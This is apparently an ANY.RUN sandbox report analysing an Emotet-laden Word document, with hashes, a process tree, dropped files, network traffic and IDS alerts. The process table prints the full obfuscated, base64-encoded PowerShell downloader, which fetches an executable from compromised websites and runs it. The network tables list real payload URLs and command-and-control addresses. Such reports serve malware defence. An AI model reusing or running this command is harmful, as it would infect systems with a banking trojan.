download: | bGhc-B7DEaH3SyTTHIV_Epdnfikz-Oe |
Full analysis: | https://app.any.run/tasks/7799813c-e227-450f-a714-bbbaa3a16eb5 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | April 14, 2019, 15:53:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Apr 12 13:20:00 2019, Last Saved Time/Date: Fri Apr 12 13:20:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 5, Security: 0 |
MD5: | BFFAFB1999BB97D360E331DF6D4DDB48 |
SHA1: | 302D51A0CB9D93D06D598A351E952DC43BF50999 |
SHA256: | 323C0EF4AC6D8F00C2FAB49442378460F64AD686349B3469DBB56D20C3CF05B2 |
SSDEEP: | 3072:/77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8quiRrrADnskxHRayKyko8deTdqjVHD:/77HUUUUUUUUUUUUUUUUUUUT52VE4Dng |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 5 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 5 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:04:12 12:20:00 |
CreateDate: | 2019:04:12 12:20:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3364 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\bGhc-B7DEaH3SyTTHIV_Epdnfikz-Oe.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2724 | PoWeRsHelL -e JABqAEEAUQBBAFoANABvAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBVACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAbABHAFEAYwBrACcALAAnAEEAJwApACwAJwBBACcAKQApADsAJABUAHcAQQBBAFUARwBBACAAPQAgACcANwA1ADkAJwA7ACQAQQAxAEEAQgBVAEIAPQAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAgACcAUQBvACcALAAnAEEAWABEACcALAAnAEwAXwAnACkAOwAkAG0AUQBVAEEAQQBHAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABUAHcAQQBBAFUARwBBACsAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAGUAJwAsACcALgBlAHgAJwApADsAJABHAEEAWABBAEEAQQBDAHcAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAJwBRACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAFoAYwAnACwAJwBGAF8AJwApACwAJwBBAEIAJwApADsAJABPAFUAQwBBAEEAWgBrAEMAPQAuACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqACcAKwAnAGUAYwB0ACcAKQAgAE4AYABFAHQALgBgAHcARQBiAGMAbABpAGUAbgBUADsAJABVAFEAQQBjAFgAQQA9ACgAIgB7ADYAfQB7ADIANgB9AHsAMgA5AH0AewAyAH0AewAxADAAfQB7ADcAfQB7ADEAfQB7ADkAfQB7ADEAMgB9AHsAMQAxAH0AewAyADAAfQB7ADEANwB9AHsAMgA3AH0AewAzADEAfQB7ADIANAB9AHsAOAB9AHsAMQA2AH0AewAwAH0AewAyADEAfQB7ADMAfQB7ADIAOAB9AHsANAB9AHsAMQA0AH0AewAyADIAfQB7ADEAMwB9AHsAMQA4AH0AewA1AH0AewAyADUAfQB7ADEANQB9AHsAMgAzAH0AewAzADAAfQB7ADEAOQB9ACIAIAAtAGYAJwByAG8AJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHQAcwBjAGwAJwAsACcAcgAnACkALAAnAG8AJwApACwAJwBoACcALAAnAGQAJwAsACcAdgBlAHIAJwAsACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACcALwAvACcALAAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAgACcAbABvAGcAbwBtACcALAAnAG4AYwAnACwAJwB1ACcAKQAsACcAcAA6ACcAKQAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAJwBoAHQAJwAsACcAdABwACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnADoAJwAsACcALwAvAHIAJwApACkALAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBrAHMAcAAnACwAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAJwBjAHIAJwAsACcAYQByACcALAAnAGUAZQAnACkALAAnAGUAJwApACwAJwA6AC8ALwAnACwAJwB1AGIAJwAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAC8AYwBsACcALAAnADoALwAnACwAJwB0AHQAcAAnACkALAAoACIAewA0AH0AewAwAH0AewAxAH0AewAzAH0AewAyAH0AIgAtAGYAIAAnAEAAaAB0ACcALAAnAHQAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnADoALwAvACcALAAnAHYAaQAnACkALAAnAHAAJwAsACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQAiACAALQBmACAAJwBlAG4AJwAsACcAbgAnACwAJwB0ACcALAAnAHQALwBPAF8AYwAvACcAKQApACwAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBvAG0ALwAnACwAJwB3ACcAKQAsACcALgBjACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAG8AJwAsACcAcAAtAGMAJwApACkALAAoACIAewAxAH0AewAyAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAGkAJwAsACcAZABpAGEAJwAsACcALwBWAF8AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAQABoACcALAAnAGkALwAnACkAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbQAvACcALAAnAGMAbwAnACkALAAnAGEALgAnACkALAAnAC8AdwBwACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAGkAbgBjAG8AbgAnACwAJwByACcAKQAsACcAYQBkAGEAJwApACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwAvAEcAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAZQBuAHQAJwAsACcAbgB0ACcAKQAsACcAYwBvACcAKQAsACcAdAB0ACcALAAnAG4AaAAvACcALAAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAYwAnACwAJwBvAG0ALwAnACkALAAnAG8ALgAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBpAHYAJwAsACcAdgBhAHMAJwApACwAJwB3AHAALQAnACkALAAnAGwAYQBuACcALAAnAG0AZQAnACwAKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACAAJwBXAHoAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbwBuAHQAJwAsACcALQBjACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAZQAnACwAJwBuAHQALwAnACkAKQAsACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACcAdABwACcALAAnAC8AQABoACcALAAnAHQAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBtACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAC4AYwBvACcALAAnAGgAJwApACkALAAoACIAewAxAH0AewAzAH0AewA0AH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAGYAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAYQBrACcALAAnAG8AbgAnACkALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAC8AJwAsACcAYgBpAG4AJwApACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBjAG8AJwAsACcALgBjACcAKQAsACcAbwBtAC8AJwApACwAJwBfACcALAAnAG8AJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAG4ALwBAACcALAAnAF8AYQAnACkALAAnAF8AJwAsACcAcQAnACkALgAiAHMAUABgAGwASQB0ACIAKAAnAEAAJwApADsAJABKAEEAUQBBAEEAMQBrAD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACAAJwBaACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAQQA0AEIAJwAsACcAQQAnACkALAAnAFgAJwApACwAJwBHACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHYAawBEADEAQgBBACAAaQBuACAAJABVAFEAQQBjAFgAQQApAHsAdAByAHkAewAkAE8AVQBDAEEAQQBaAGsAQwAuACIAZABPAFcATgBgAGwATwBgAEEAZABmAGkAYABMAEUAIgAoACQAdgBrAEQAMQBCAEEALAAgACQAbQBRAFUAQQBBAEcAKQA7ACQAVQBYAF8AUQBBADQAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAF8AJwAsACcARABBAEEAJwAsACcARwBBACcAKQAsACcAMQBaACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABtAFEAVQBBAEEARwApAC4AIgBMAEUATgBgAGcAYABUAGgAIgAgAC0AZwBlACAAMwA0ADQAOAAwACkAIAB7ACYAKAAnAEkAJwArACcAbgB2AG8AawBlAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAG0AUQBVAEEAQQBHADsAJABSAFEAUQBVAFUAXwBBAD0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwBzAHcAJwAsACcAQQBBACcALAAnAFUAVQAnACkAOwBiAHIAZQBhAGsAOwAkAHoAVQAxAEEAQQBBAD0AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAUQAnACwAJwBEAG8AJwAsACcAegBrAEIAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABKADQAQgBaAEQAMQBBAFoAPQAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAEEAQwAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAHUAQQBBACcALAAnAEMAJwApACwAJwB4AFEAJwApAA== | C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe | WmiPrvSE.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2184 | "C:\Users\admin\759.exe" | C:\Users\admin\759.exe | — | PoWeRsHelL.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows SQM Consolidator Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
756 | --56c3b279 | C:\Users\admin\759.exe | 759.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows SQM Consolidator Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1740 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 759.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows SQM Consolidator Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
860 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows SQM Consolidator Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6478.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2724 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9STUTJMBK6ZFF2321OSV.temp | — | |
MD5:— | SHA256:— | |||
2724 | PoWeRsHelL.exe | C:\Users\admin\759.exe | — | |
MD5:— | SHA256:— | |||
3364 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:03F75A861CC10AD1C3318BEB891B725B | SHA256:7EBE4AE513B230A4E93B55D5C5B1A8281E935A6A42B38FA33B58EA5B73980E58 | |||
2724 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF106dcf.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$hc-B7DEaH3SyTTHIV_Epdnfikz-Oe.doc | pgc | |
MD5:AFAD233EC55D90CC4E41CC418ADD5AC0 | SHA256:E4B03414AC97677FADB02C3A1942EC0AD7A04283CC15506E4F650ECA66442160 | |||
3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:26AA39717398BE899C8A2A18D1BB5C07 | SHA256:64E333B20F67A7ECFEDEC839568998745CCB7CDBA013C7450DE784BF262ED2B9 | |||
2724 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
756 | 759.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:9A72A0ACFDE313CF105B1A57A070C88D | SHA256:C251152C9B174696E76B69D7C69DABD5159EE904923642FBBA02B4CA5D35E105 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
860 | soundser.exe | POST | — | 117.193.28.115:80 | http://117.193.28.115/results/mult/ringin/ | IN | — | — | malicious |
2724 | PoWeRsHelL.exe | GET | 200 | 107.154.158.53:80 | http://clearcreeksportsclub.com/cgi-sys/suspendedpage.cgi | US | html | 944 b | unknown |
860 | soundser.exe | POST | 200 | 94.11.25.255:80 | http://94.11.25.255/sess/tpt/ringin/merge/ | GB | binary | 132 b | malicious |
2724 | PoWeRsHelL.exe | GET | 302 | 107.180.27.238:80 | http://vivasivo.com/wp-content/G_q/ | US | html | 229 b | suspicious |
2724 | PoWeRsHelL.exe | GET | 200 | 107.180.43.3:80 | http://rinconadarolandovera.com/media/V_ii/ | US | executable | 124 Kb | malicious |
2724 | PoWeRsHelL.exe | GET | 404 | 5.63.8.179:80 | http://ronakco.com/bin/f_an/ | IR | html | 1.35 Kb | suspicious |
2724 | PoWeRsHelL.exe | GET | 302 | 107.154.158.53:80 | http://clearcreeksportsclub.com/wp-content/O_c/ | US | html | 315 b | unknown |
2724 | PoWeRsHelL.exe | GET | 200 | 107.180.27.238:80 | http://vivasivo.com/cgi-sys/suspendedpage.cgi | US | html | 7.12 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
860 | soundser.exe | 117.193.28.115:80 | — | National Internet Backbone | IN | malicious |
2724 | PoWeRsHelL.exe | 5.63.8.179:80 | ronakco.com | Faraso Samaneh Pasargad Ltd. | IR | suspicious |
860 | soundser.exe | 94.11.25.255:80 | — | Sky UK Limited | GB | malicious |
2724 | PoWeRsHelL.exe | 107.180.27.238:80 | vivasivo.com | GoDaddy.com, LLC | US | suspicious |
2724 | PoWeRsHelL.exe | 107.180.43.3:80 | rinconadarolandovera.com | GoDaddy.com, LLC | US | malicious |
2724 | PoWeRsHelL.exe | 107.154.158.53:80 | clearcreeksportsclub.com | Incapsula Inc | US | unknown |
Domain | IP | Reputation |
---|---|---|
ronakco.com |
| suspicious |
clearcreeksportsclub.com |
| unknown |
vivasivo.com |
| suspicious |
rinconadarolandovera.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2724 | PoWeRsHelL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2724 | PoWeRsHelL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2724 | PoWeRsHelL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2724 | PoWeRsHelL.exe | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) |
860 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
860 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |